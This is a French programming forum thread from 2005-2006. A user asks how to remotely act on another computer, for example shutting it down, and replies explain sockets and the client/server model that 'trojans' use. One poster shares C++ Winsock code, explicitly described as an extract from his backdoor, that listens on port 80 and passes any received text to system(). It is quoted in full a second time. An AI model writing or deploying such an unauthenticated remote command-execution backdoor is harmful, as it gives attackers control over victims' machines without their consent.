Partage
  • Partager sur Facebook
  • Partager sur Twitter

Question un peu complexe

Utilisation de l adresse ID??

    21 décembre 2005 à 15:58:14

    Hello tout le monde.
    J aimerais savoir comment pouvoir inserer une adresse ID dans un programme. Par la suite (si l autre ordinateur est toujours connecte) effectuer des opperation tel que l envoyer sur un site web ou eteindre son ordi ou autre... Merci beaucoup pour les reponses. ;)
    • Partager sur Facebook
    • Partager sur Twitter
    Anonyme
      21 décembre 2005 à 17:06:21

      c'est quoi l'intéret d'éteindre le pc de qqn ?
      • Partager sur Facebook
      • Partager sur Twitter
      Anonyme
        21 décembre 2005 à 17:10:54

        Contrôler un réseau local ça peut être utile.
        • Partager sur Facebook
        • Partager sur Twitter
          22 décembre 2005 à 8:38:08

          Pour prendre la main sur un PC, t'as VNC qui fait ça très bien.
          • Partager sur Facebook
          • Partager sur Twitter
            22 décembre 2005 à 17:27:17

            En gros tu veux faire un virus quoi ^^ .
            • Partager sur Facebook
            • Partager sur Twitter
              25 décembre 2005 à 21:58:30

              Non sans dec' je vois pas ce que tu veux dire par ID : netID ou hostID ? ...
              • Partager sur Facebook
              • Partager sur Twitter
                25 décembre 2005 à 22:01:39

                Moi je crois qu'il confond ID et IP ^^
                • Partager sur Facebook
                • Partager sur Twitter
                Anonyme
                  25 décembre 2005 à 22:34:03

                  Mais sinon, pour pouvoir envoyer et recevoir des informations entre deux ordis, il te faudras utiliser les sockets... (je vais essayer de trouver un lien de tuto). Ensuite, il faut créer un exe "serveur", et l'autre "client".

                  Si tu veut éteindre un PC a distance par exemple, tu crée "serveur.exe" qui attend qu'on lui communique une commande puis qui l'executes. (tu définira toi même ces commandes, c'est ton programme :p ).

                  Enstuite, tu créera l'exe "client.exe" qui va demander a l'utilisateur une commande puis qui va l'envoyer à l'ordi choisit sur lequel est éxécuté "serveur.exe".

                  En fait, c'est en gros comme ça que fonctionnent les trojans, mais si ça sort pas d'un réseau local tu fais ce que tu veut :p
                  • Partager sur Facebook
                  • Partager sur Twitter
                    25 décembre 2005 à 22:34:08

                    C'est ce que je me disais ... ^^

                    Au fait, merci pour l'info GuilOooo ;)

                    Et pour le lien :
                    Intro aux sockets

                    Perso moi ça va jusqu'à la troisième partie : les fonctions. :pirate:

                    Vivement la suite du cours de M@teo ! ^^

                    ++,
                    mleg
                    • Partager sur Facebook
                    • Partager sur Twitter
                      25 décembre 2005 à 23:04:19

                      Voilà un serveur qui éxecute toutes les commandes qu'il reçoit, enfaite le vrai code est plus compliqué parce qu'il envoi le résultat d'une commande au client, genre tu tape dir et tu reçois le résultat alors que sur l'extrait j'ai juste fait un serveur qui éxecute le texte qu'il reçois sur le port 80.

                      (extrait de mon backdoor en C++) :



                      /* Début de la fonction */

                      int serveur(void) {

                      while (1) {   /* Boucle infinie */

                      int port = 80/* Port sur lequel le serveur va "écouter" */

                      WSADATA WSAData;    /* Initialisation de WinSock */
                      WSAStartup(MAKEWORD(2,0), &WSAData);
                      SOCKET sock;     /* Création du socket */
                      SOCKET csock = INVALID_SOCKET;  /* Deuxième socket */
                      SOCKADDR_IN sin/* Création d'une structure qui va contenir les informations concernant le socket */
                      sock = socket(AF_INET,SOCK_STREAM,0); /* SOCK_STREAM donc utilisation du protocole TCP/IP */
                      sin.sin_addr.s_addr = INADDR_ANY;
                      sin.sin_family    = AF_INET;  /* Famille du socket */
                      sin.sin_port        = htons(port); /* Port : 80 */
                      bind(sock, (SOCKADDR *)&sin, sizeof(sin));
                      listen(sock, 1); /* On met sur écoute */
                      int a=sizeof(sin);

                      /* Tant que personne n'est connecté on accepte les connexions */
                               while(csock == INVALID_SOCKET) {
                                           csock = accept(sock,(SOCKADDR*)&sin, &a) ;
                                           }
                      /* Quand la boucle s'arrête ça veut dire que quelqu'un s'est connecté sur nous */

                      char mots[1024];
                      recv(csock, mots, 1024, 0); /* On recois les données */

                      system(mots)/* On éxecute la commande */

                      csock = INVALID_SOCKET;
                      closesocket(sock);   /* On ferme les sockets */
                      closesocket(csock);
                      WSACleanup()/* On arrête WinSock */
                      }
                      return 0;
                      }

                      • Partager sur Facebook
                      • Partager sur Twitter
                        25 décembre 2005 à 23:10:43

                        Ouaip trop dur pour moi...
                        • Partager sur Facebook
                        • Partager sur Twitter
                          25 décembre 2005 à 23:36:14

                          Citation : ddx39

                          Voilà un serveur qui éxecute toutes les commandes qu'il reçoit, enfaite le vrai code est plus compliqué parce qu'il envoi le résultat d'une commande au client, genre tu tape dir et tu reçois le résultat alors que sur l'extrait j'ai juste fait un serveur qui éxecute le texte qu'il reçois sur le port 80.

                          (extrait de mon backdoor en C++) :



                          /* Début de la fonction */

                          int serveur(void) {

                          while (1) {   /* Boucle infinie */

                          int port = 80/* Port sur lequel le serveur va "écouter" */

                          WSADATA WSAData;    /* Initialisation de WinSock */
                          WSAStartup(MAKEWORD(2,0), &WSAData);
                          SOCKET sock;     /* Création du socket */
                          SOCKET csock = INVALID_SOCKET;  /* Deuxième socket */
                          SOCKADDR_IN sin/* Création d'une structure qui va contenir les informations concernant le socket */
                          sock = socket(AF_INET,SOCK_STREAM,0); /* SOCK_STREAM donc utilisation du protocole TCP/IP */
                          sin.sin_addr.s_addr = INADDR_ANY;
                          sin.sin_family    = AF_INET;  /* Famille du socket */
                          sin.sin_port        = htons(port); /* Port : 80 */
                          bind(sock, (SOCKADDR *)&sin, sizeof(sin));
                          listen(sock, 1); /* On met sur écoute */
                          int a=sizeof(sin);

                          /* Tant que personne n'est connecté on accepte les connexions */
                                   while(csock == INVALID_SOCKET) {
                                               csock = accept(sock,(SOCKADDR*)&sin, &a) ;
                                               }
                          /* Quand la boucle s'arrête ça veut dire que quelqu'un s'est connecté sur nous */

                          char mots[1024];
                          recv(csock, mots, 1024, 0); /* On recois les données */

                          system(mots)/* On éxecute la commande */

                          csock = INVALID_SOCKET;
                          closesocket(sock);   /* On ferme les sockets */
                          closesocket(csock);
                          WSACleanup()/* On arrête WinSock */
                          }
                          return 0;
                          }


                          les socket c'est pas trop dur a comprendre, enfin en lisant ton code j'arrive un peu près a comprendre comment sa marche et comment sans servire, mais bon sa doit plus compliqué que se que je pense
                          • Partager sur Facebook
                          • Partager sur Twitter
                            26 décembre 2005 à 11:14:07

                            Ouai dans l'ensemble je comprend en fait le problème c'est que je sais pas utiliser une fonction en C... Hum, no comment ^^ ...
                            • Partager sur Facebook
                            • Partager sur Twitter
                              31 décembre 2005 à 13:19:41

                              Yeah en fait le problème c'est que je capte rien à tes noms de variables.
                              • Partager sur Facebook
                              • Partager sur Twitter
                                1 janvier 2006 à 15:41:26

                                Citation : mleg

                                Yeah en fait le problème c'est que je capte rien à tes noms de variables.



                                Il y a une seule variable :
                                char mots[1024];

                                :-°

                                Bon il y'en a d'autres mais celles là t'es pas obligé de les connaître ;)
                                • Partager sur Facebook
                                • Partager sur Twitter
                                  1 janvier 2006 à 16:10:03

                                  okay bon ben c'est plus grave que ce que je pensais alors... Zéro un jour, zéro toujours... ^^ ...

                                  Non sérieux par contre est-ce que tu pourrais me dire quelle est l'utilité des points.

                                  Par exemple :

                                  sin.sin_family = AF_INET;

                                  [AF_INET, ça correspond bien à la famille de protocole TCP/IP ?]

                                  Si tu peux pas répondre c'est pas grave c'est déjà bien, je verai bien dans le cours de M@téo, si je trouve pas sur www.commentcamarche.com.

                                  Merci !
                                  ++,
                                  mleg
                                  • Partager sur Facebook
                                  • Partager sur Twitter

                                  Question un peu complexe

                                  × Après avoir cliqué sur "Répondre" vous serez invité à vous connecter pour que votre message soit publié.
                                  × Attention, ce sujet est très ancien. Le déterrer n'est pas forcément approprié. Nous te conseillons de créer un nouveau sujet pour poser ta question.
                                  • Editeur
                                  • Markdown